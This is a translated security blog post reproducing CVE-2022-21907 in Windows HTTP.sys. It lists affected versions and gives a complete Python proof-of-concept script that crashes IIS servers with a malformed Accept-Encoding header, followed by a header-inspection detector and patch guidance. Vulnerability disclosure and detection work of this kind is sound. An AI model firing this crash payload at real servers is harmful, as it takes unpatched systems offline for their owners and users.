
Reproducing the HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2022-21907)

Author: 洛米唯熊
Published 2022-01-23 14:52:23

0x00 Vulnerability overview

The HTTP protocol stack contains a remote code execution vulnerability: a boundary error in the HTTP Trailer Support feature of HTTP.sys can lead to a buffer overflow.

An unauthenticated attacker can trigger the buffer overflow by sending specially crafted HTTP packets to a web server and thereby execute arbitrary code on the target system. Microsoft flags the vulnerability as "wormable": it requires no user interaction and can self-propagate across the network.

CVSS score: 9.8

0x01 Affected versions

Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

0x02 Reproduction

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : CVE-2022-21907_http.sys_crash.py
# Author             : Podalirius (@podalirius_)
# Date created       : 13 Jan 2022

import argparse
import datetime
import requests
import time
import threading


def parseArgs():
    parser = argparse.ArgumentParser(description="CVE-2022-21907 HTTP.sys crash check: sends one crafted request and watches whether the target stays reachable.")
    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
    return parser.parse_args()


def monitor_thread(target, dtime=5):
    # Poll the target about once per second and report whether it still answers.
    # A request that starts timing out after the payload was sent is the sign
    # that HTTP.sys has bugchecked and the host is rebooting.
    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)
    for _ in range(dtime):
        try:
            requests.get(target, timeout=1)
        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout):
            # The 1-second timeout already paces this branch, so no extra sleep.
            print("   [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        else:
            print("   [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
            time.sleep(1)


if __name__ == '__main__':
    options = parseArgs()

    # Normalise the target to a URL; plain hosts default to http://
    if not options.target.startswith('http://') and not options.target.startswith('https://'):
        target = "http://" + options.target
    else:
        target = options.target

    # Malformed Accept-Encoding value that triggers the HTTP.sys parsing bug
    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'

    # Start the monitor first so the reachable -> down transition is visible
    t = threading.Thread(target=monitor_thread, args=(target,))
    t.start()
    time.sleep(2)

    # Sending payload: a timeout here, with the monitor reporting the target
    # as down, means the crash was triggered
    print("   [+] Sending payload ...")
    try:
        requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)
    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout):
        t.join()
        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))

    # Cleanup (joining an already-finished thread is harmless)
    t.join()
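The request above abuses the Accept-Encoding header, so a reverse proxy or WAF in front of IIS can flag values that do not look like a normal content-coding list before they reach HTTP.sys. The following detector is an added example written for this post; it is not part of the original article or of Podalirius's script. The length limit, the set of known codings and the sample requests are assumptions constructed for the demonstration.

```python
import re

# Grammar from RFC 7231 section 5.3.4 / RFC 7230 section 3.2.6: each list element is a
# token (or "*"), optionally followed by a q-value weight such as ";q=0.8".
TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
ELEMENT_RE = re.compile(r"^(?:" + TCHAR + r")(?:\s*;\s*[qQ]=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?$")

# Codings a normal client actually advertises (assumption; extend for your fleet).
KNOWN_CODINGS = {"*", "identity", "gzip", "x-gzip", "deflate", "compress", "x-compress", "br", "zstd"}
MAX_LEN = 200  # assumption: a legitimate Accept-Encoding list is a few dozen bytes


def inspect_accept_encoding(value):
    """Return the reasons a header value looks abnormal; [] means it looks benign."""
    reasons = []
    if len(value) > MAX_LEN:
        reasons.append("length %d > %d" % (len(value), MAX_LEN))
    for raw in value.split(","):
        element = raw.strip()
        coding = element.split(";")[0].strip().lower()
        if not element:
            reasons.append("empty list element")
        elif not ELEMENT_RE.match(element):
            reasons.append("malformed element %r" % element[:16])
        elif coding not in KNOWN_CODINGS:
            reasons.append("unknown coding %r" % coding[:16])
    return reasons


def scan_request(raw_request):
    """Find Accept-Encoding in a raw HTTP/1.1 request head and inspect it."""
    for line in raw_request.split("\r\n")[1:]:
        if not line:  # end of the header block
            break
        name, _, val = line.partition(":")
        if name.strip().lower() == "accept-encoding":
            return inspect_accept_encoding(val.strip())
    return []


# Constructed sample requests (not captured traffic). SUSPECT mimics only the shape of
# the crash PoC header: long 'A' tokens with '&' and '*' runs, stray spaces, empty elements.
BENIGN = "GET / HTTP/1.1\r\nHost: example.test\r\nAccept-Encoding: gzip, deflate, br\r\n\r\n"
SUSPECT = ("GET / HTTP/1.1\r\nHost: example.test\r\nAccept-Encoding: "
           + ",".join(["A" * 120, "A" * 90 + "&AA&**AA**A", "*" * 12 + "AAA", " *", " ", ""])
           + "\r\n\r\n")

if __name__ == "__main__":
    print("benign :", scan_request(BENIGN))
    print("suspect:", scan_request(SUSPECT))
```

Run the detector on the proxy tier, not on the IIS host itself: once the malformed request reaches HTTP.sys the kernel has already parsed it.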

0x03 Remediation

Microsoft has released patches for the affected versions; affected users should apply the official security update promptly. Link:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907

This article was shared from the WeChat official account 洛米唯熊 under the Tencent Cloud self-media sharing program. Originally published 2022-01-22.
